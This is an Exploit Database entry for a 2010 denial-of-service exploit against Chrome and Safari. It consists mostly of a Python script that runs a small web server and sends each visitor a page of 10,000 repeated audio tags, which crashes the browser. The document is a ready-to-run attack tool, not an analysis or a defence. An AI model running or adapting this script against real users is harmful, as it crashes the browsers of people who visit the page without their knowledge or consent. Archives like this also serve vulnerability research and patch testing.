Multiple Browsers – Audio Tag Denial of Service

• Exploit Database
• 12 阅读

• 作者： Chase Higgins
  日期： 2010-04-21
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/12324/

• #!/usr/bin/python
  
  #Multiple Browsers Audio Tag Denial of Service Vulnerability
  #any ogg file can be used for the DoS as long as it is a valid file on the server
  #crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
  #This script acts as a web server to DoS connecting clients
  
  # Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
  # Date: April 21th, 2010
  # Author: Chase Higgins, http://twitter.com/tzDev
  # Software Link: google.com/chrome, apple.com/safari
  # Version: Google Chrome 5.0.375.9 dev
  # Tested on: Mac OSX 10.5.8
   
  import sys, socket;
  
  def main():
  	html = """
  	<html>
  	<body>
  	""";
  	
  	html += "<audio src='https://www.exploit-db.com/exploits/12324/myogg.ogg'>" * 10000;
  	
  	html += """
  	</body>
  	</html>
  	""";
  	
  	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
  	s.bind(('', 2121));
  	s.listen(1);
  	
  	while True:
  		channel, details = s.accept();
  		print channel.recv(256);
  		channel.send(html);
  		channel.close();
  	
  main();